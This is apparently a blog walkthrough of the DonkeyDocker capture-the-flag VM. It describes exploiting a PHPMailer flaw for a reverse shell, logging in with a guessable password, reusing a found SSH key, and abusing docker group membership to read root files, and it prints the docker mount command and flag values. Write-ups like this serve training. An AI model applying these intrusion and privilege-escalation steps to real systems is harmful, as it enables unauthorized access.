SecTalks Adelaide – DonkeyDocker CTF Walkthrough

Had a couple of spare hours this afternoon, so decided to have a go at the SecTalks DonkeyDocker CTF.

Downloaded the DonkeyDocker CTF from VulnHub.

The VM shows the IP in the boot screen.

Scanned with nmap, ports 22 & 80 open

Kicked off a dirb scan straight away, some false positives reported (HTTP Error Code 301s), but quickly appeared to be running PHPMailer. This has had some vulnerabilities in recent memory.

Directory structure matches that of the PHPMailer GitHub repo.

Sent a test query, then using Burp grabbed the post and sent it to repeater so we can modify and execute the post request manually.

Using the details on the PoC I tested the payload. Initially, it failed. Further enumeration revealed that the application was hosted at the path /www – so the exploit was updated to use this path, at which point it succeeded!

I then re-issued the command with a shell payload, setup my NC handler, and executed – and received bacon a shell!

Once on the server, we were clearly inside a Docker container.

Enumeration revealed that a user ‘smith’ existed inside the docker container.

‘su smith’ with the password ‘smith’ logs us into this users account.

flag.txt:

smith@12081bd067cc:~$ cat flag.txt
 cat flag.txt
 This is not the end, sorry dude. Look deeper!
 I know nobody created a user into a docker
 container but who cares? ;-)

But good work!
Here a flag for you: flag0{9fe3ed7d67635868567e290c6a490f8e}

PS: I like 1984 written by George ORWELL

So.. where to from here?

.ssh directory contains private key, and the authorized_hosts file shows the username is ‘orwell’.

SSH to the host with that private key and access is immediately granted:

Welcome to
  ___           _            ___          _
 |   \ ___ _ _ | |_____ _  _|   \ ___  __| |_____ _ _
 | |) / _ \ ' \| / / -_) || | |) / _ \/ _| / / -_) '_|
 |___/\___/_||_|_\_\___|\_, |___/\___/\__|_\_\___|_|
                        |__/
                             Made with <3 v.1.0 - 2017


This is my first boot2root - CTF VM. I hope you enjoy it.
if you run into any issue you can find me on Twitter: @dhn_
or feel free to write me a mail to:

- Email: dhn@zer0-day.pw
 - GPG key: 0x2641123C
 - GPG fingerprint: 4E3444A11BB780F84B58E8ABA8DD99472641123C

Level: I think the level of this boot2root challange
 is hard or intermediate.

Try harder!: If you are confused or frustrated don't forget
 that enumeration is the key!

Thanks: Special thanks to @1nternaut for the awesome
 CTF VM name!

Feedback: This is my first boot2root - CTF VM, please
 give me feedback on how to improve!

Looking forward to the write-ups!

So far, good stuff. Lets get that sweet root shell!

User ‘orwell’ is in the ‘docker’ group. This, according to the information provided by the Docker team, means the user may as well be considered root.

Created a Docker image at this point and executed it, following the directions on https://reventlov.com/advisories/using-the-docker-command-to-root-the-host

I then had a suid ‘sh’ binary, owned by root, sitting in temp. But, this is busybox! It drops privs for just about everything, so no matter what I do, I can’t get it to run as root.

No ability to add users.
No ability to change a user password.
No ability to really do anything of use at this point, except echo the flag itself, using a similar command…

donkeydocker:~/docker-test$ docker run -v /root:/stuff -t my-docker-image /bin/sh -c 'cat flag.txt' 
YES!! You did it :-). Congratulations!

I hope you enjoyed this CTF VM.

Drop me a line on twitter @dhn_, or via email dhn@zer0-day.pw

Here is your flag: flag2{60d14feef575bacf5fd8eb06ec7cd8e7}